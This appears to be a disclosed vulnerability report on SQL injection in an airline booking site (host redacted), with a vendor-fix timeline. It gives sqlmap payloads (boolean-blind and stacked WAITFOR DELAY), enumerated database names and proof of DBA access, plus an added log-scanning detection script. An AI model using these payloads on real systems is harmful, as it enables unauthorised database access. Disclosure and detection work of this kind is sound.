2015-11-23: Details have been sent to the vendor and are awaiting vendor handling
2015-11-26: Vendor has confirmed; details disclosed to the vendor only
2015-12-06: Details disclosed to core white hats and experts in related fields
2015-12-16: Details disclosed to ordinary white hats
2015-12-26: Details disclosed to intern white hats
2016-01-05: Vendor has fixed the vulnerability and disclosed it proactively; details disclosed to the public
As titled.
The injection point is in the POST request used to query flight schedules:
POST /timetable/schedules.asp HTTP/1.1
Host: **.**.**.**:8084
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8084/timetable/schedules.asp
Cookie: ASPSESSIONIDCQQBQQDA=MPNNGOFDMHAAFPJJDBKFIPBH
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

Segment2=ONE_WAY&f_orig=TPE&f_dest=TPE&GoYY=2015&Gomm=Nov&Godd=20&BackYY=2015&Backmm=Nov&Backdd=20
Data retrieved by sqlmap:

web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[16:26:54] [INFO] fetching current user
[16:26:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:26:54] [INFO] retrieved: guestuser
current user: 'guestuser'
A second injection point (GET parameter seq):
http://**.**.**.**:8084/holidays/hotel_detail.asp?route=mfm&seq=3
Place: GET
Parameter: seq
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=mfm&seq=3 AND 2663=2663

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: route=mfm&seq=3; WAITFOR DELAY '0:0:5';--
---
[15:58:16] [INFO] testing MySQL
[15:58:16] [WARNING] the back-end DBMS is not MySQL
[15:58:16] [INFO] testing Oracle
[15:58:16] [WARNING] the back-end DBMS is not Oracle
[15:58:16] [INFO] testing PostgreSQL
[15:58:17] [WARNING] the back-end DBMS is not PostgreSQL
[15:58:17] [INFO] testing Microsoft SQL Server
[15:58:17] [INFO] confirming Microsoft SQL Server
[15:58:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[15:58:17] [INFO] fetching current user
[15:58:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:58:17] [INFO] retrieved: guestuser
current user: 'guestuser'
Boolean-based blind injection; 23 databases are exposed:

available databases [23]:
[*] cn_web
[*] ctu_Web
[*] hgh_Web
[*] master
[*] mo_web
[*] model
[*] msdb
[*] nkg_Web
[*] pek_Web
[*] pvg_Web
[*] ReportServer
[*] ReportServerTempDB
[*] s_airmacau
[*] szx_Web
[*] tempdb
[*] tpe_web
[*] tw_amh
[*] tw_web
[*] tw_web_event
[*] tw_web_internal
[*] tw_web_outstation
[*] tw_web_telex
[*] xmn_Web
The database user has DBA privileges:

[16:15:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[16:15:18] [INFO] testing if current user is DBA
[16:15:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:15:18] [INFO] retrieved: 1
current user is DBA: 'True'
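The two techniques sqlmap confirmed against the seq parameter (boolean-based blind and a stacked WAITFOR DELAY) leave recognisable traces in web server access logs. The following is an added detection example, not part of the original report: it scans constructed IIS-style log lines (date, time, method, uri-stem, uri-query, status, time-taken) for those patterns, flags non-integer values in a parameter that should only ever be an integer, and corroborates a time-based payload with the response time. The log format, field order and sample values are assumptions for this example.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (not from the report); the last field is
# time-taken in milliseconds. The URL path and parameters match the GET injection point.
SAMPLE_LOG = """\
2015-11-20 15:58:10 GET /holidays/hotel_detail.asp route=mfm&seq=3 200 120
2015-11-20 15:58:16 GET /holidays/hotel_detail.asp route=mfm&seq=3+AND+2663%3D2663 200 118
2015-11-20 15:58:17 GET /holidays/hotel_detail.asp route=mfm&seq=3%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B-- 200 5120
2015-11-20 15:58:20 GET /timetable/schedules.asp - 200 90
"""

# Signatures for the two techniques sqlmap reported (matched on the URL-decoded value).
PATTERNS = {
    "boolean_blind": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "stacked_waitfor": re.compile(r";\s*waitfor\s+delay\b", re.I),
}
# Parameters that legitimately carry only an integer (seq in the report's URL).
INTEGER_PARAMS = {"seq"}

def inspect_query(query):
    """Return findings for one cs-uri-query, e.g. ['boolean_blind:seq']."""
    findings = []
    if query == "-":          # IIS writes '-' when there is no query string
        return findings
    for name, values in parse_qs(query).items():   # parse_qs URL-decodes values
        for value in values:
            for label, pattern in PATTERNS.items():
                if pattern.search(value):
                    findings.append(f"{label}:{name}")
            # A type check catches payload variants the signatures do not cover.
            if name in INTEGER_PARAMS and not value.strip().isdigit():
                findings.append(f"non_integer:{name}")
    return findings

def scan_log(text):
    """Return (timestamp, uri-stem, findings) for every line that raises a finding."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue
        date, clock, _method, stem, query, _status, time_taken = fields
        findings = inspect_query(query)
        # A response of 5 s or more on a line carrying WAITFOR shows the delay ran.
        if any(f.startswith("stacked_waitfor") for f in findings) and int(time_taken) >= 5000:
            findings.append("delay_observed")
        if findings:
            hits.append((f"{date} {clock}", stem, findings))
    return hits

if __name__ == "__main__":
    for when, stem, findings in scan_log(SAMPLE_LOG):
        print(when, stem, ", ".join(findings))
```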
Severity: High
Vulnerability Rank: 18
Confirmation time: 2015-11-26 18:11
Thanks for the report.
2016-01-05: Fix confirmed